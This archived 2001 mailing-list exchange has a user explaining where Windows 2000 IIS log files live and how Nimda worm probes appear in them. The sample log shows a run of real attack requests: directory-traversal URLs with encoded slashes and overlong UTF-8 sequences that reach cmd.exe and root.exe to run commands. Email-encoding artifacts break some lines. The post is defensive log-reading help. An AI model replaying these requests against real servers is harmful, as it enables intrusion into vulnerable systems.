[Date Prev][Date
Next][Thread Prev][Thread Next][Date
Index][Thread Index]
RE: Re: IIS Worm
Thanks Mark
Pedro de Oliveira
-----Original Message-----
From: Mark Hetherington [mailto:mark.egroups@xxxxxxx]=20
Sent: 19 September 2001 10:39
To: ukha_d@xxxxxxx
Subject: [ukha_d] Re: IIS Worm
--- In ukha_d@y..., Pedro de Oliveira <oliveirp@B...> wrote:
> I am new to this IIS thing so any help would be appreciated. I am
on a LAN
> and am serving via IIS. I know I was not affected by Nimda but
would like
> to know if an attempt was made to infect me. I remember there is a
log for
> these types of things but I can't remember for the life of me where
it is.
> I am running Win2k Pro.
Pedro,=20
Look at the following location:
C:\WINNT\system32\LogFiles
This should have log files for most of your services. The W3SVC=20
directories relate to the web server logs.=20
An attack will look similar to this (note: IP addresses blanked for=20
privacy, first IP is the attacking machine, second is your web server=20
IP):
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/root.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /MSADC/root.exe /c+dir 403 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-19
00:06:0=
0
xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir=20
500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir=20
404 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /msadc/..%5c../..%5c../..%
5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/system32/cmd.exe /c+dir 403 -
200=
1-09-19
00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 500 - 2001-09-19
00:0=
6:00
xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-19
00:06:0=
1
xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-19
00:06:0=
1
xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-19
00:06:0=
2
xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
HTH.
Mark.
For more information: http://www.automatedhome.co.uk=20
Post message: ukha_d@xxxxxxx=20
Subscribe: ukha_d-subscribe@xxxxxxx=20
Unsubscribe: ukha_d-unsubscribe@xxxxxxx=20
List owner: ukha_d-owner@xxxxxxx=20
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/=20
For more information: http://www.automatedhome.co.uk=20
Post message: ukha_d@xxxxxxx=20
Subscribe: ukha_d-subscribe@xxxxxxx=20
Unsubscribe: ukha_d-unsubscribe@xxxxxxx=20
List owner: ukha_d-owner@xxxxxxx=20
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/=20
Home |
Main Index |
Thread Index
|